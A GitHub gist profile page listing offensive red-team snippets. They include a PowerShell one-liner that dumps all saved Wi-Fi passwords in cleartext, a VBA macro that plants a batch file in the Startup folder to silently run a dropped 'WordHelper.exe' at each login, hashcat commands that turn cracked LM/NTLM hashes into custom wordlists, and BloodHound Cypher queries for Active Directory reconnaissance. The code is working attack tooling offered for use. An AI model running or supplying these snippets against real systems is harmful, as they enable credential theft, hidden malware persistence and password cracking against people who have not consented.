Skip to content

Instantly share code, notes, and snippets.

View javierantunez's full-sized avatar

Javier Antunez javierantunez

View GitHub Profile
@javierantunez
javierantunez / wifipass
Created September 2, 2022 16:28
wifipass (ingles o español)
if ((Get-WinSystemLocale).NAME.split("-")[0] -eq "es") { $keyString ="Contenido de la clave\W+\:(.+)$"} else {if ((Get-WinSystemLocale).NAME.split("-")[0] -eq "en") { $keyString ="Key Content\W+\:(.+)$"}};(netsh wlan show profiles) | Select-String "\:(.+)$" | %{$name=$_.Matches.Groups[1].Value.Trim(); $_} | %{(netsh wlan show profile name="$name" key=clear)} | Select-String $keystring | %{$pass=$_.Matches.Groups[1].Value.Trim(); $_}| %{[PSCustomObject]@{ PROFILE_NAME=$name;PASSWORD=$pass }}| Format-Table -AutoSize
@javierantunez
javierantunez / VBA Persistence autorun
Created May 6, 2022 04:10
Simple VBA current user autorun persistence using bat and powershell to execute dropped file
Sub persist()
'Autorun persistence
userprofile = CStr(Environ("USERPROFILE"))
'File must exist (ie using VBA DROPPER)
archivoDescarga = userprofile & "\AppData\Local\Microsoft\Office\WordHelper.exe"
strFileContent = "powershell -Sta -Nop -Window Hidden" & " " & archivoDescarga
strPersistPath = userprofile + "\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
strPersistFilePath = "\updater.bat"
@javierantunez
javierantunez / gist:070b7e4957c6cb9908bb90c28eb8481e
Last active April 16, 2022 02:44
Custom-dictionary-from-cracked-hashes
# Durante sesiones de cracking la creacion de diccionarios custom me ha resultado de utilidad. Para automatizar un poco el proceso de enriquecer diccionarios, utilice powershell.
# During cracking sessions, the creation and user of custom dictionaries has been useful. To automate a little the dictioary enrichment, i used powershell
######################################################################################################
# Option 1 (more ps command line focused)
# LM cracked
(.\hashcat.exe -m 3000 hashes.txt --username --potfile-path hashcat.potfile --show) | foreach {$_. split(':')[2]} | out-file temp.dic -Encoding ascii
# NTLM cracked
(.\hashcat.exe -m 1000 hashes.txt --username --potfile-path hashcat.potfile --show) | foreach {$_. split(':')[2]} | out-file temp.dic -Encoding ascii -append
@javierantunez
javierantunez / red-teaming-bloodhound-cypher-queries.md
Created November 16, 2021 03:50 — forked from mgeeky/red-teaming-bloodhound-cypher-queries.md
A handy list of Cypher queries that I've used during AD assessments
  • Returns computer names and their operating system for statistics purposes
MATCH (c:Computer) WHERE c.operatingsystem is not null RETURN c.name as Name, c.operatingsystem as OS
  • Returns a summary report of machines grouped by their operating systems versions, along with number of machines running specific OS version:
MATCH (c:Computer) WHERE c.operatingsystem is not null MATCH (n:Computer {operatingsystem: c.operatingsystem}) RETURN c.operatingsystem as OS, count(distinct n) AS Number ORDER BY Number DESC